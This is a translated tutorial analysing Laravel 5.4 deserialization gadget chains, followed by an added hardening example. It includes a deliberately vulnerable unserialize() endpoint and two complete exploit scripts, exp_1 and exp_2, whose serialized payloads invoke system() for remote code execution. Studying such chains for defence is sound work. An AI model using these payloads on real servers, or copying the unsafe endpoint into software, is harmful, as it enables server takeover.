Laravel 5.4 deserialization


Preface

Laravel is a clean, elegant PHP web development framework (PHP Web Framework).

Environment setup: deploying Laravel 5.4

composer create-project laravel/laravel=5.4 laravel5-4 --prefer-dist
cd laravel5-4
php artisan serve

Visit http://127.0.0.1:8000

Add a route
routes/web.php

Route::get('/seri', "SeriController@seri");

Add a controller
app/Http/Controllers/SeriController.php

<?php
namespace App\Http\Controllers;

class SeriController extends Controller
{
    public function seri()
    {
        // Deliberately vulnerable test endpoint: request data goes straight into unserialize()
        if (isset($_GET['code'])) {
            $code = $_GET['code'];
            unserialize($code);
        } else {
            highlight_file(__FILE__);
        }
        return "The laravel version is 5.4!";
    }
}

Access path
http://127.0.0.1:8000/seri

Vulnerability analysis

Find a __destruct() method

src/Illuminate/Broadcasting/PendingBroadcast.php


Here both $this->events and $this->event are controllable.

Find an exploitable __call() method: Generator.php

src/Faker/Generator.php

Analysis

Look up the format() method


$arguments is the controllable parameter we pass in; when $this->getFormatter($formatter) returns system, this gives RCE.
Look at the getFormatter() method


Here $this->formatters is controllable.
It returns $this->formatters[$formatter] directly, and $formatter is dispatch,
so constructing $this->formatters = ['dispatch' => 'system'] satisfies the requirement.

Reproduction

<?php
// exp_1.php
namespace Illuminate\Broadcasting {
    use Faker\Generator;

    class PendingBroadcast
    {
        protected $events;
        protected $event;

        public function __construct($cmd)
        {
            $this->event = $cmd;
            $this->events = new Generator;
        }
    }

    $seri = new PendingBroadcast('whoami');
    echo base64_encode(serialize($seri));
}

namespace Faker {
    class Generator
    {
        protected $formatters = array();

        public function __construct()
        {
            $this->formatters = array('dispatch' => 'system');
        }
    }
}


But submitting it produces an error


The reason is that PendingBroadcast.php has a __wakeup() method


Comment out that method and run it again


The command executes successfully

Manager.php

src/Illuminate/Support/Manager.php

Analysis

Enter the driver() method

First look at the createDriver() method

callCustomCreator() contains a variable function call,
and $this->customCreators and $this->app are both controllable.

Go back and see where $driver comes from

getDefaultDriver() is an abstract method, so we need to find a subclass that overrides it.

Go to the ChannelManager.php file
src/Illuminate/Notifications/ChannelManager.php


Look at the getDefaultDriver() method
Now $driver can be made controllable.

Finally, setting $this->customCreators[$driver] = 'system' and $this->app = 'whoami' is enough to execute the command.

Reproduction

<?php
// exp_2.php
namespace Illuminate\Broadcasting {
    use Illuminate\Notifications\ChannelManager;

    class PendingBroadcast
    {
        protected $events;

        public function __construct($cmd)
        {
            $this->events = new ChannelManager($cmd);
        }
    }

    $seri = new PendingBroadcast('whoami');
    echo base64_encode(serialize($seri));
}

namespace Illuminate\Notifications {
    class ChannelManager
    {
        protected $app;
        protected $defaultChannel;
        protected $customCreators;

        public function __construct($cmd)
        {
            $this->defaultChannel = 'shivers';
            $this->customCreators = array('shivers' => 'system');
            $this->app = $cmd;
        }
    }
}


The command executes
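As an added example that is not part of the original post or of Laravel itself, here is a hardened replacement for the seri() handler. unserialize() has accepted an allowed_classes option since PHP 7.0; with it set to false, any object in the payload becomes a __PHP_Incomplete_Class instead of instantiating gadget classes such as PendingBroadcast, so no __wakeup(), __destruct() or __call() of a gadget ever runs. The helper names and the sample inputs are constructed for illustration.

```php
<?php
declare(strict_types=1);

// Added example (not from the original post or Laravel): helper names and
// sample inputs below are constructed for illustration.

// Recursively check whether a decoded value contains any object placeholder.
function containsIncompleteClass($value): bool
{
    if ($value instanceof __PHP_Incomplete_Class) {
        return true;
    }
    if (is_array($value)) {
        foreach ($value as $item) {
            if (containsIncompleteClass($item)) {
                return true;
            }
        }
    }
    return false;
}

// allowed_classes => false (PHP >= 7.0): no class is ever instantiated, so the
// magic methods that drive the POP chains above are never reached.
function safeUnserialize(string $data)
{
    $value = @unserialize($data, ['allowed_classes' => false]);
    if ($value === false && $data !== serialize(false)) {
        throw new InvalidArgumentException('malformed serialized data');
    }
    if (containsIncompleteClass($value)) {
        throw new InvalidArgumentException('object payloads are not accepted');
    }
    return $value;
}

// Constructed inputs: a plain array, and the outer object of the exp_1 chain.
$benign = serialize(['id' => 7, 'tags' => ['a', 'b']]);
$gadget = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":0:{}';

var_dump(safeUnserialize($benign)['id']);
try {
    safeUnserialize($gadget);
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), PHP_EOL;
}
```

The stronger fix is not to unserialize request data at all (a JSON body does the same job without object instantiation); this helper only removes the gadget surface for a handler that must keep the format.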

Reference

https://xz.aliyun.com/t/9478

Original URL: http://outofmemory.cn/langs/1001263.html
